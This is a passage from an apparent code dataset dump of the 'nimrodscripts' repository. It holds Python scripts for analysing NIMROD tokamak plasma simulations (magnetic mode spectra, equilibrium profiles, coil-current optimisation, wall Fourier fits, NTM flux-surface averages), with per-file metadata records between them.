thispsi=thisbmn\n for ix,iv in enumerate(self.vprime):\n thispsi[ix,:]=iv*thispsi[ix,:]\n self.psimnlist.append(thispsi)\n if not(self.surfmn_data):\n print(\"Can not read surfmn file in read_surfmn\")\n raise\n def plot_surfmn(self,field,nn,**kwargs): #(*args,**kwargs)\n ''' To do, I want to clean up the api'''\n# make sure surfmn has been read and preform a consistancy check\n# on the input\n if nn<1:\n print(\"nn must be positive by convention in plot_surfmn\")\n raise ValueError\n if not(self.surfmn_data):\n self.read_surfmn()\n ndex=self.ndict[nn]\n showplot=False\n# Create a new figure if an axis object is not included in kwargs\n if 'axis' in kwargs:\n ax = kwargs['axis']\n else:\n showplot=True\n if 'figsize' in kwargs:\n fig = plt.figure(figsize=kwargs['figsize'])\n else:\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n# Determine which field to plot and set titles and labels\n if (field=='b'):\n fmn=np.copy(self.bmnlist[ndex])\n title=f\"$b$ for n={int(nn)} at {self.time*1000:.3f}ms\"\n elif (field=='psi'):\n fmn=np.copy(self.psimnlist[ndex])\n title=f\"$\\psi$ for n={int(nn)} at {self.time*1000:.3f}ms\"\n if \"scale\" in kwargs:\n fmn*=kwargs[\"scale\"]\n# set contour levels, i could generalize this further if needed\n levels=kwargs.get(\"levels\",301)\n vmax=kwargs.get(\"vmax\",np.amax(fmn))\n levels=np.linspace(0,vmax,301)\n cbar_ticks=np.linspace(0,vmax,11)\n# Update plot based on keys in kwargs\n title=kwargs.get(\"title\",title)\n ylabel=kwargs.get(\"ylabel\",r'<r> [m]')#todo this should be rho\n xlabel=kwargs.get(\"xlabel\",\"Poloidal Mode number m\")\n fontsize=kwargs.get(\"fontsize\",16)\n showplot=kwargs.get(\"plot\",showplot) #orverides showplot logic\n# set up mrange()\n mrange=np.linspace(self.qmin,self.qmax)\n#create the surfmn plot\n plt.set_cmap('nipy_spectral')\n conf=plt.contourf(self.mr[0,:,:],self.mr[1,:,:],fmn,levels=levels,vmax=vmax)\n plt.plot(nn*mrange,self.psi_q(mrange),c='w')\n plt.title(title,fontsize=fontsize)\n plt.ylabel(r'<r>',fontsize=fontsize)\n plt.xlabel('m',fontsize=fontsize)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n if showplot:\n plt.show()\n\n # Do awesome stuff\n def plot_radial(self,field,nn,mlist,**kwargs):\n ''' To do, I want to clean up the api'''\n if not(self.surfmn_data):\n self.read_surfmn()\n if nn<1:\n print(\"nn must be positive by convention in plot_radial\")\n raise ValueError\n ndex=self.ndict[nn]\n showplot=False\n# Create a new figure if an axis object is not included in kwargs\n if 'axis' in kwargs:\n ax = kwargs['axis']\n else:\n showplot=True\n if 'figsize' in kwargs:\n fig = plt.figure(figsize=kwargs['figsize'])\n else:\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n if (field=='b'):\n fmn=np.copy(self.bmnlist[ndex])\n title=f\"$b_m$ for n={int(nn)} at {self.time*1000:.3f}ms\"\n ylable=\"b\"\n elif (field=='psi'):\n fmn=np.copy(self.psimnlist[ndex])\n title=f\"$\\psi_m$ for n={int(nn)} at {self.time*1000:.3f}ms\"\n ylabel=f\"$\\psi$\"\n if \"scale\" in kwargs:\n fmn*=kwargs[\"scale\"]\n colorlist = list(mcolors.TABLEAU_COLORS)\n# Update plot based on keys in kwargs\n title=kwargs.get(\"title\",title)\n ylabel=kwargs.get(\"ylabel\",ylabel)#todo this should be rho\n xlabel=kwargs.get(\"xlabel\",r'<r> [m]')\n fontsize=kwargs.get(\"fontsize\",16)\n showplot=kwargs.get(\"plot\",showplot) #orverides showplot logic\n qlist=kwargs.get(\"qlist\",[])\n for im,this_m in enumerate(mlist):\n this_i = self.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(this_m)\n tc=colorlist[im]\n ax.plot(self.mr[1,:,1],fmn[:,this_i], color=tc, label=mlbl)\n for iq,qq in enumerate(qlist):\n try:\n irho = self.psi_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0)\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.tight_layout()\n if showplot:\n plt.show()\n\n def plot_radial_rho(self,field,nn,mlist,**kwargs):\n ''' To do, I want to clean up the api'''\n if not(self.surfmn_data):\n self.read_surfmn()\n if nn<1:\n print(\"nn must be positive by convention in plot_radial\")\n raise ValueError\n ndex=self.ndict[nn]\n showplot=False\n# Create a new figure if an axis object is not included in kwargs\n if 'axis' in kwargs:\n ax = kwargs['axis']\n else:\n showplot=True\n if 'figsize' in kwargs:\n fig = plt.figure(figsize=kwargs['figsize'])\n else:\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n if (field=='b'):\n fmn=np.copy(self.bmnlist[ndex])\n title=f\"$b_m$ for n={int(nn)} at {self.time*1000:.3f}ms\"\n ylable=\"b\"\n elif (field=='psi'):\n fmn=np.copy(self.psimnlist[ndex])\n title=f\"$\\psi_m$ for n={int(nn)} at {self.time*1000:.3f}ms\"\n ylabel=f\"$\\psi$\"\n if \"scale\" in kwargs:\n fmn*=kwargs[\"scale\"]\n colorlist = list(mcolors.TABLEAU_COLORS)\n# Update plot based on keys in kwargs\n title=kwargs.get(\"title\",title)\n ylabel=kwargs.get(\"ylabel\",ylabel)#todo this should be rho\n xlabel=kwargs.get(\"xlabel\",r'$\\rho$')\n fontsize=kwargs.get(\"fontsize\",16)\n showplot=kwargs.get(\"plot\",showplot) #orverides showplot logic\n qlist=kwargs.get(\"qlist\",[])\n print(self.rho)\n print(self.mr)\n print(self.profs.q)\n for im,this_m in enumerate(mlist):\n this_i = self.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(this_m)\n tc=colorlist[im]\n ax.plot(self.profs.get_rho_q(self.q[20:]),fmn[20:,this_i], color=tc, label=mlbl)\n for iq,qq in enumerate(qlist):\n try:\n irho = self.profs.get_rho_q(qq)\n print(irho,qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0)\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.xlim(0,1)\n plt.tight_layout()\n if showplot:\n plt.show()\n\n def get_resonance(self,field,nn,mm):\n ''' Evaluate the resonant component of a field at the given resonces'''\n if nn<1:\n print(\"nn must be positive by convention in get_resonance\")\n raise ValueError\n ndex=self.ndict[nn]\n mdex=self.get_m_index(mm)\n if ndex==None:\n print(f\"{nn} is not a n number in surfmn file\")\n raise ValueError\n if mdex==None:\n print(f\"{mm} is not an m number in surfmn file\")\n raise ValueError\n qres=mm/nn\n if qres<self.qmin or qres>self.qmax:\n print(qres,self.qmin,self.qmax)\n print(f\"The q value {qres} is not resonant\")\n raise ValueError\n if (field=='b'):\n resfield=interp.interp1d(self.rho,self.bmnlist[ndex][:,mdex])\n elif (field=='psi'):\n resfield=interp.interp1d(self.rho,self.psimnlist[ndex][:,mdex])\n else:\n print(f\"Field {field} is not reconized\")\n raise\n return resfield(self.psi_q(qres))\n def get_profiles(self):\n self.profdata=True\n self.profs=pf.Profiles(self.dumpfile,self.nimrodin)\n self.profs.calculate(rzo=[1.768,-0.018831,0.0])\n def dump(self,file):\n pickle.dump(self.surfmn_file,file)\n pickle.dump(self.dumpfile,file)\n pickle.dump(self.step,file)\n pickle.dump(self.time,file)\n pickle.dump(self.nimrodin,file)\n pickle.dump(self.mmax,file)\n pickle.dump(self.surfmn_data,file)\n pickle.dump(self.nlist,file)\n pickle.dump(self.ndict,file)\n pickle.dump(self.bmnlist,file)\n pickle.dump(self.psimnlist,file)\n pickle.dump(self.rho,file)\n pickle.dump(self.vprime,file)\n pickle.dump(self.q,file)\n pickle.dump(self.mr,file)\n pickle.dump(self.psi_q,file)\n pickle.dump(self.qmin,file)\n pickle.dump(self.qmax,file)\n pickle.dump(self.profdata,file)\n if(self.profdata==True):\n self.profs.dump(file)\n def load(self,file):\n self.surfmn_file=pickle.load(file)\n self.dumpfile=pickle.load(file)\n self.step=pickle.load(file)\n self.time=pickle.load(file)\n self.nimrodin=pickle.load(file)\n self.mmax=pickle.load(file)\n self.surfmn_data=pickle.load(file)\n self.nlist=pickle.load(file)\n self.ndict=pickle.load(file)\n self.bmnlist=pickle.load(file)\n self.psimnlist=pickle.load(file)\n self.rho=pickle.load(file)\n self.vprime=pickle.load(file)\n self.q=pickle.load(file)\n self.mr=pickle.load(file)\n self.psi_q=pickle.load(file)\n self.qmin=pickle.load(file)\n self.qmax=pickle.load(file)\n self.profdata=pickle.load(file)\n if(self.profdata==True):\n self.profs=pf.Profiles(self.dumpfile,self.nimrodin)\n self.profs.load(file)\n" }, { "alpha_fraction": 0.6304348111152649, "alphanum_fraction": 0.6887871623039246, "avg_line_length": 19.34883689880371, "blob_id": "de258f987a1e6a41d0ff66d2b8cbec66106869c7", "content_id": "e16afa9b3987ba07956d4c00882114aa7e169da5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 874, "license_type": "no_license", "max_line_length": 71, "num_lines": 43, "path": "/plotingScripts/eqInputPlts.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n\nhomeDir = os.environ['HOME']\n\nfname=home + \"/SCRATCH/NTM_TESTING/18102204_refine/eq_input_python.out\"\n\n\ndata = np.loadtxt(fname)\n\n\nrho = np.sqrt(data[:,1])\nprint rho\nq = data[:,4]\nq[0] = q[1]\nf = data[:,2]\np = data[:,3]\nprint q\n\n\n\nfig, ax1 = plt.subplots()\nax1.plot(rho, q, 'b-')\nax1.set_xlabel(r'$\\rho$',fontsize=16)\nax1.axes.set_xlim(left=0,right=1)\n\n# Make the y-axis label, ticks and tick labels match the line color.\nax1.set_ylabel('Safety Factor',rotation=90,fontsize=16)\nax1.axes.set_ylim(0,11)\n\nax2 = ax1.twinx()\nax2.plot(rho, p, 'r-')\nax2.set_ylabel('Pressure (Tm)',rotation=90,fontsize=16)\nax2.axes.set_ylim(0,0.14)\n\nax1.tick_params(axis='both', which='major', labelsize=14)\nax2.tick_params(axis='both', which='major', labelsize=14)\nplt.locator_params(axis='y', nbins=6)\nfig.tight_layout()\n\nplt.show()" }, { "alpha_fraction": 0.6327028870582581, "alphanum_fraction": 0.6931055784225464, "avg_line_length": 26.299999237060547, "blob_id": "cf4b7a549e1ec7352f1d857caa978d7057887c40", "content_id": "5220db1cccafe82684085a1010da55e1e615c4d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1639, "license_type": "no_license", "max_line_length": 100, "num_lines": 60, "path": "/biotSavart/coilRun.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# Input files:\n# Ouput file:\n\n\nimport os\nimport shutil\nimport biotSavartFunction as bsf\nimport scipy.optimize as opt\nimport numpy as np\n\ndirectory = os.getcwd()\ndir_list=[\"gs\",\"vac\"]\n\nhome_dir = os.environ['HOME']\n\nfgnimeq_cmd = home_dir + \"/SCRATCH/nimall/builds/nimdevel/ser/bin/fgnimeq-ser\"\nnimrod_cmd = home_dir + \"/SCRATCH/nimall/builds/nimdevel/ser/bin/nimrod-ser\"\nnimplot_cmd = home_dir + \"/SCRATCH/nimall/builds/nimdevel/ser/bin/nimplot < nimplot_inputs\"\n\ngs_files=[\"a174446.03390\",\"fluxgrid.in\",\"g174446.03390\",\"nimeq.in\",\"nimrod.in\",\n\"nimrod_bdry_rz.txt\",\"oculus.in\",\"p174446.3390.0_new_rot_fits\",\"p174446.3390.0_new_rot_fits.smooth\"]\nvac_files=[\"nimrod.in_vac\",\"nimplot_inputs\"]\nsrc_dir=\"nimrod_files\"\nfiles_dict={\"gs\":gs_files, \"vac\":vac_files}\n\nthis_coils=0\n\ndef run_nimrod():\n os.chdir(\"gs\")\n os.system(fgnimeq_cmd)\n os.chdir(\"..\")\n src_path=\"gs/dumpgll.00000.h5\"\n cp_path =\"vac/dumpgll.00000.h5\"\n shutil.copy(src_path, cp_path)\n os.chdir(\"vac\")\n os.system(nimrod_cmd)\n os.system(nimplot_cmd)\n os.chdir(\"..\")\n\ndef wrapper_fun(currents):\n this_coils.coil_calc(currents)\n run_nimrod()\n fileName=\"vac/surfmn.00100.h5\"\n cost=bsf.surfmn_eval(fileName)\n with open(\"runlog.txt\",'a+') as this_file:\n this_file.write(\"Status at step \\n\")\n this_file.write(\"Coil currents \\n\")\n this_file.write(str(currents))\n this_file.write(\"\\n Cost function \\n\")\n this_file.write(str(cost))\n this_file.write(\" \\n\")\n return cost\n\n### start main program\n\n### set up coils\ncurrents=[0.47528571, -0.57160186, 0.6809352, -0.13174283]\nthis_coils=bsf.coil_opt(\"./\")\nthis_coils.coil_calc(currents)\n\n" }, { "alpha_fraction": 0.5437511801719666, "alphanum_fraction": 0.5596777200698853, "avg_line_length": 42.75409698486328, "blob_id": "fee084098a7a5b37bc4d8e89d07be05a11d453a5", "content_id": "feba315f11d0465df964545cfc2276e97ad8be2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5337, "license_type": "no_license", "max_line_length": 108, "num_lines": 122, "path": "/trip2Nim/tripClass.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' Base class for storing and reading trip3D data '''\nimport numpy as np\nclass TripClass:\n probeRzFile = \"\"\n probeBFile = \"\"\n probeAFile = \"\"\n bData = np.zeros(1)\n aData = np.zeros(1)\n npoints = 0\n nphi = 0\n rr = np.zeros(1)\n zz = np.zeros(1)\n phi = np.zeros(1)\n brReal = np.zeros(1)\n bzReal = np.zeros(1)\n btReal = np.zeros(1)\n brPhase = np.zeros(1,dtype=np.complex_)\n bzPhase = np.zeros(1,dtype=np.complex_)\n shiftindex=0\n complexConj=False\n def __init__ (self,rzFile, aFile, bFile, shiftindex, complexConj):\n ''' Initialize TripClass '''\n self.probeRzFile = rzFile\n self.probeBFile = bFile\n self.probeAFile = aFile\n self.shiftindex = shiftindex\n self.complexConj = complexConj\n def readRz (self):\n ''' Read probeRz File as Save data '''\n #todo\n def readBFile (self):\n ''' Read probeBFile as Save Data '''\n #b data is stores phi, r, z, B_phi, B_R, B_Z, B_p, B_mag, PsiN_pol\n self.bData = np.loadtxt(self.probeBFile,comments='%')\n def reorderBFile(self):\n ''' Reorder the bfile to account for a shift in the data '''\n if (self.shiftindex==0):\n return\n else:\n # reorder data becuase jake changed the indexing in NIMROD\n tempData = self.bData\n for ip in range(self.nphi):\n startIndex= ip * self.npoints\n for ii in range(self.npoints):\n if(ii>=self.shiftindex):\n self.bData[ii-self.shiftindex+startIndex,:]=tempData[ii+startIndex,:]\n else:\n self.bData[self.npoints-self.shiftindex+ii+startIndex,:]=tempData[ii+1+startIndex,:]\n# self.bData = np.zeros(tempData.shape)\n# maxData=self.bData.shape[0]\n# for ii in range(maxData): \n def readAFile (self):\n ''' Read probeAFile as Save Data '''\n #b data is stores phi, r, z, A_phi, A_R, A_Z, A_p, A_mag, PsiN_pol\n self.aData = np.loadtxt(self.probeAFile,comments='%')\n def findNumPoints (self, data):\n phi0 = data[0,0]\n for ii in range(data.shape[0]):\n if (data[ii,0]!=phi0):\n self.npoints =ii \n break\n self.nphi = int(data.shape[0]/self.npoints)\n def flipPhi (self):\n for ii, iphi in enumerate(self.phi):\n print (ii, iphi)\n self.phi[ii] = 360.0 - iphi\n if (self.phi[ii]==360.0): self.phi[ii]=0.0\n def processBFile (self):\n self.readBFile()\n self.findNumPoints(self.bData)\n self.reorderBFile()\n self.phi = np.zeros(self.nphi)\n self.brReal = np.zeros([self.npoints,self.nphi])\n self.bzReal = np.zeros([self.npoints,self.nphi])\n self.btReal = np.zeros([self.npoints,self.nphi])\n self.rr = self.bData[:self.npoints,1]\n self.zz = self.bData[:self.npoints,2]\n for ii in range(self.nphi):\n startIndex = ii * self.npoints\n self.phi[ii] = self.bData[startIndex,0]\n self.brReal[:,ii] = self.bData[startIndex:startIndex+self.npoints,4]\n self.bzReal[:,ii] = self.bData[startIndex:startIndex+self.npoints,5]\n self.btReal[:,ii] = self.bData[startIndex:startIndex+self.npoints,3]\n # i don't know if I need to flip phi or change the sign of Bphi\n #self.flipPhi()\n # to be consistant with nimrod I should use the forward fft when going\n # from real space to fourier space, and I also need to devide by nphi\n # numpy does not have an option for normalizing the FFT by n,\n # it can only do sqrt(N) normalization or normalize the IFFT by N.\n if self.complexConj:\n self.brPhase = np.fft.ifft(self.brReal,axis=1)\n self.bzPhase = np.fft.ifft(self.bzReal,axis=1)\n self.btPhase = np.fft.ifft(self.btReal,axis=1)\n else:\n self.brPhase = np.fft.fft(self.brReal,axis=1)/(float(self.nphi))\n self.bzPhase = np.fft.fft(self.bzReal,axis=1)/(float(self.nphi))\n self.btPhase = np.fft.fft(self.btReal,axis=1)/(float(self.nphi))\n \n def writeNimrodBext(self,path,baseFileName,fileExt):\n if (self.nphi % 2 == 0): #even\n maxnphi = int(self.nphi/2)\n else: #odd\n maxnphi = int((self.nphi+1)/2)\n for ii in range (maxnphi +1):\n \n if ii==maxnphi:\n fac=0.5\n else:\n fac=1.0\n print(ii, maxnphi, fac)\n tempFileName = path + baseFileName +\"{0:0=2d}\".format(ii) + fileExt\n thisFile = open(tempFileName,'w')\n for jj in range(self.brPhase.shape[0]):\n thisLine = '{: 16.16e}'.format(fac*self.brPhase[jj,ii].real) + \", \" \n thisLine+= '{: 16.16e}'.format(fac*self.brPhase[jj,ii].imag) + \", \"\n thisLine+= '{: 16.16e}'.format(fac*self.bzPhase[jj,ii].real) + \", \" \n thisLine+= '{: 16.16e}'.format(fac*self.bzPhase[jj,ii].imag) + \", \"\n thisLine+= '{: 16.16e}'.format(fac*self.btPhase[jj,ii].real) + \", \" \n thisLine+= '{: 16.16e}'.format(fac*self.btPhase[jj,ii].imag) + \"\\n\"\n thisFile.write(thisLine)\n thisFile.close()" }, { "alpha_fraction": 0.5786939859390259, "alphanum_fraction": 0.6025533676147461, "avg_line_length": 37.231998443603516, "blob_id": "1cf057c2fe76bd0549119ac5295e68bd97146c3c", "content_id": "5d935fc2f7cf9911fdfa9b9fbc617bbd41caa8b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4778, "license_type": "no_license", "max_line_length": 95, "num_lines": 125, "path": "/trip2Nim/nim_wall.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport numpy as np\nimport scipy.fftpack as fft\nimport matplotlib.pyplot as plt\nimport scipy.optimize as opt\nclass NimrodWall:\n ''' Base class for dealing with NIMROD wall files '''\n wall_file = ''\n wall_modes = -1 # Number of Fouier modes in wall\n plt_wall = False\n check_ft = False # check my Fourier transform\n wall_points = 500 # points to use in high res wall\n file_rz = np.zeros([1,2])\n rm_wall = np.zeros(1)\n zm_wall = np.zeros(1)\n rz_wall = np.zeros([1,2])\n rz2_wall = np.zeros([1,2])\n def __init__(self, file, modes, plot_wall=False, check_ft=False,*args, **kwargs):\n ''' Initalize NimrodWall class '''\n self.wall_file=file\n self.wall_modes=modes\n self.plt_wall=plot_wall\n self.check_ft=check_ft\n self.read_file()\n self.get_fourier()\n self.get_wall_rz()\n if self.check_ft:\n self.rz2_wall =np.zeros([self.wall_points,2])\n for itheta, theta in enumerate(np.linspace(0,2*np.pi,num=self.wall_points)):\n self.rz2_wall[itheta,0],self.rz2_wall[itheta,1] = self.get_rz_theta(theta)\n if self.plt_wall:\n self.plot_rz()\n def read_file(self):\n ''' Read a nimrod wall file '''\n self.file_rz = np.loadtxt(self.wall_file, delimiter=',', skiprows=1)\n def get_fourier(self):\n ''' Calculate the Fourier coffiecents of R and Z \n\n The fourier modes are stored as followes:\n index 0 : m=0\n index 1 : real m=1\n index 2 : imag m=1\n index 2l-1 : real m = l\n index 2l : imag m = l\n '''\n rm = fft.rfft(self.file_rz[:,0])/self.file_rz.shape[0]\n zm = fft.rfft(self.file_rz[:,1])/self.file_rz.shape[0]\n if self.wall_modes < 0: # use all the Fourier modes\n self.rm_wall = rm\n self.zm_wall = zm\n else: # Truncate Fourier spectrum \n max_index = min(2*self.wall_modes+1,rm.size)\n self.rm_wall = rm[:max_index]\n self.zm_wall = zm[:max_index]\n def get_wall_rz(self):\n ''' Calculate a high resolution wall from the fourier RZ '''\n r_wall = fft.irfft(self.rm_wall,self.wall_points)*self.wall_points\n z_wall = fft.irfft(self.zm_wall,self.wall_points)*self.wall_points\n self.rz_wall = np.stack((r_wall,z_wall),axis=-1) \n def get_rz_theta(self, theta):\n ''' Return a given RZ location on the wall as a function of theta \n\n Here theta is an angle in radians\n '''\n rt = self.rm_wall[0]\n zt = self.zm_wall[0]\n m = self.rm_wall.size\n if self.rm_wall.size % 2: #odd\n m_max = int((self.rm_wall.size-1)/2)\n m_modes = range(1,m_max+1)\n else: # even\n m_max = int(self.rm_wall.size)/2+1\n m_modes = range(1,m_max)\n rt += self.rm_wall[-1]*np.cos(theta * m_max)\n zt += self.zm_wall[-1]*np.cos(theta * m_max)\n for im, m in enumerate(m_modes,1):\n rt += 2.0*(self.rm_wall[2*im-1]*np.cos(theta*m)-self.rm_wall[2*im]*np.sin(theta*m))\n zt += 2.0*(self.zm_wall[2*im-1]*np.cos(theta*m)-self.zm_wall[2*im]*np.sin(theta*m))\n return rt, zt\n def get_drz_dtheta(self, theta):\n ''' Return a the theta derivative of RZ along the wall at theta \n\n Here theta is an angle in radians\n '''\n rt = 0\n zt = 0\n m = self.rm_wall.size\n if self.rm_wall.size % 2: #odd\n m_max = int((self.rm_wall.size-1)/2)\n m_modes = range(1,m_max+1)\n else: # even\n m_max = int(self.rm_wall.size)/2+1\n m_modes = range(1,m_max)\n rt += self.rm_wall[-1]*np.sin(theta * m_max)*m_max\n zt += self.zm_wall[-1]*np.sin(theta * m_max)*m_max\n for im, m in enumerate(m_modes,1):\n rt += 2.0*m*(self.rm_wall[2*im-1] * np.sin(theta*m) + self.rm_wall[2*im]*np.cos(theta*m))\n zt += 2.0*m*(self.zm_wall[2*im-1] * np.sin(theta*m) + self.zm_wall[2*im]*np.cos(theta*m))\n return rt, zt\n def get_theta_rz(self,r,z):\n ''' Return the theta value at r,z on the surface '''\n #opts = {\"maxiter\" : 10000}\n opts = {}\n dist = (self.rz_wall[:,0]-r)**2 + (self.rz_wall[:,1]-z)**2\n guess = np.argmin(dist)/self.rz_wall.shape[0] * 2*np.pi\n opt_theta = opt.minimize(self.dist,guess,(r,z),method='CG',tol=1e-5,options=opts)\n if not opt_theta.success:\n print(\"get_theta_rz optimze failed with message: \" + opt_theta.message)\n return opt_theta.x[0],self.dist(opt_theta.x[0],r,z)\n\n def dist(self,theta, *args):\n ''' Return the distance between a point on the surface and r,z '''\n ro = args[0]\n zo = args[1]\n r,z = self.get_rz_theta(theta)\n dist = np.sqrt((ro-r)**2 + (zo-z)**2)\n return dist\n def plot_rz(self):\n plt.plot(self.file_rz[:,0],self.file_rz[:,1], 'bo', label=\"Orginal Wall\")\n plt.plot(self.rz_wall[:,0],self.rz_wall[:,1], 'g-', label=\"Smooth Wall\")\n if self.check_ft:\n plt.plot(self.rz2_wall[:,0],self.rz_wall[:,1], 'k-', label=\"2nd Wall\")\n plt.legend(loc=1)\n plt.show()" }, { "alpha_fraction": 0.7716390490531921, "alphanum_fraction": 0.7716390490531921, "avg_line_length": 40.69230651855469, "blob_id": "141fb5d96e9d90893f74a4975e4b135978f175c0", "content_id": "a22cd1ce75cdf0bb4bad385304720d772cfdbcdf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 543, "license_type": "no_license", "max_line_length": 154, "num_lines": 13, "path": "/nimflSeed/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "# nimflSeed\nThese scripts generate a random collection of start locations for NIMFL field line tracing, and write the start locations to the file start_positions.dat.\n\n## startPosClass \nContains the python script to generate random numbers. Also contains all the \nfunctions for different geometries\n\n### Todo\n - [x] Write driver script\n - [x] Write script to seed field lines for RMP calculations\n - [x] Use ingon function to more efficiently chose seed locations\n - [ ] Write a generic DIII-D seeding function\n - [x] Write function to write \n" }, { "alpha_fraction": 0.5249339938163757, "alphanum_fraction": 0.5535720586776733, "avg_line_length": 39.13351821899414, "blob_id": "68f652053476ad198cca8b9f24e1f7d66a01f624", "content_id": "7033643ae55bfa8c6f49af539850d5e1d1b861a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58314, "license_type": "no_license", "max_line_length": 124, "num_lines": 1453, "path": "/ntmscripts/ntm_step_real.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#profiles is a class for calculating 1D profiles\n# using the flux surface integration\n#\n#\nimport f90nml\nimport eval_nimrod as eval\n#import field_class as fc\nimport plot_nimrod as pn\nimport fsa\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline,griddata\nfrom scipy.fft import fft, ifft\nimport os\nimport h5py\nimport sys\nimport numpy as np\nimport pickle\nimport ntm_fields\nimport time\nimport nim_timer as timer\n\nclass ntmstep:\n def __init__(self,dumpfile,nimrodin):\n #start with dump file and nimrod.in info\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.fields=ntm_fields.ntmfields(dumpfile,nimrodin)\n self.time=None\n self.step=None\n self.eval=None\n self.grid=None\n self.mode=None #grid, fsa\n #field data\n self.fielddict={}\n # next include info on how fsa's were performed\n self.mmax=None\n self.ifour=[]\n self.nfour=None\n\n self.fsa=False\n self.dvar_dict={}\n self.fsa_dict={}\n self.interp_dict={}\n self.setprofiles=False\n self.raw_bcmn=np.empty([1])\n self.raw_bsmn=np.empty([1])\n self.raw_bmn_amp=np.empty([1])\n self.raw_bmn_phase=np.empty([1])\n\n #finally end with the profiles\n self.psin=np.empty([1])\n self.psi=np.empty([1])\n self.rhon=np.empty([1])\n self.q=np.empty([1])\n self.qpsi=np.empty([1])\n self.vprime=np.empty([1])\n self.bmn=np.empty([1])\n self.bcmn=np.empty([1])\n self.bsmn=np.empty([1])\n\n\n def dump(self,file):\n pickle.dump(self.dumpfile,file)\n pickle.dump(self.nimrodin,file)\n pickle.dump(self.time,file)\n pickle.dump(self.step,file)\n # next include info on how fsa's were performed\n pickle.dump(self.mmax,file)\n pickle.dump(self.ifour,file)\n pickle.dump(self.nfour,file)\n pickle.dump(self.fsa,file)\n pickle.dump(self.dvar_dict,file)\n pickle.dump(self.fsa_dict,file)\n pickle.dump(self.raw_bcmn,file)\n pickle.dump(self.raw_bsmn,file)\n pickle.dump(self.raw_bmn_amp,file)\n pickle.dump(self.raw_bmn_phase,file)\n\n\n def load(self,file):\n print(file)\n with open(file,'rb') as pickle_file:\n self.dumpfile=pickle.load(pickle_file)\n self.nimrodin=pickle.load(pickle_file)\n self.time=pickle.load(pickle_file)\n self.step=pickle.load(pickle_file)\n # next include info on how fsa's were performed\n self.mmax=pickle.load(pickle_file)\n self.ifour=pickle.load(pickle_file)\n self.nfour=pickle.load(pickle_file)\n self.fsa=pickle.load(pickle_file)\n self.dvar_dict=pickle.load(pickle_file)\n self.fsa_dict=pickle.load(pickle_file)\n self.raw_bcmn=pickle.load(pickle_file)\n self.raw_bsmn=pickle.load(pickle_file)\n self.raw_bmn_amp=pickle.load(pickle_file)\n self.raw_bmn_phase=pickle.load(pickle_file)\n\n if self.fsa == True:\n self.interpolate_fsa()\n\n def interpolate_fsa(self):\n\n rhomin=np.min(self.dvar_dict['rhon'])\n rhomax=np.max(self.dvar_dict['rhon'])\n print(self.dvar_dict['rhon'].shape,self.raw_bcmn.shape)\n self.rhon = np.linspace(rhomin,rhomax,300,endpoint=True)\n self.psin=interp1d(self.dvar_dict['rhon'],self.dvar_dict['psin'],kind='cubic')(self.rhon)\n self.psi =interp1d(self.dvar_dict['rhon'],self.dvar_dict['psi'] ,kind='cubic')(self.rhon)\n self.vprime=np.pi*2*interp1d(self.dvar_dict['rhon'],self.dvar_dict['vprime'],kind='cubic')(self.rhon)\n self.q=interp1d(self.dvar_dict['rhon'],self.dvar_dict['q'], kind='cubic')(self.rhon)\n self.bcmn=interp1d(self.dvar_dict['rhon'],self.raw_bcmn, kind='cubic')(self.rhon)\n self.bsmn=interp1d(self.dvar_dict['rhon'],self.raw_bsmn, kind='cubic')(self.rhon)\n self.bmn_amp =interp1d(self.dvar_dict['rhon'],self.raw_bmn_amp , kind='cubic')(self.rhon)\n self.bmn_phase =interp1d(self.dvar_dict['rhon'],self.raw_bmn_phase , kind='linear')(self.rhon)\n\n for ikey in self.fsa_dict:\n this_cmn,this_smn = self.fsa_dict[ikey]\n thismn_amp=np.sqrt(np.square(this_cmn)+np.square(this_smn))\n thismn_phase=np.arctan2(this_smn,this_cmn)\n\n cosmn=interp1d(self.dvar_dict['rhon'],this_cmn , kind='cubic')(self.rhon)\n sinmn=interp1d(self.dvar_dict['rhon'],this_smn , kind='cubic')(self.rhon)\n amp =interp1d(self.dvar_dict['rhon'],thismn_amp , kind='cubic')(self.rhon)\n phase =interp1d(self.dvar_dict['rhon'],thismn_phase , kind='linear')(self.rhon)\n print(ikey)\n self.interp_dict[ikey]=(cosmn,sinmn,amp,phase)\n\n\n def 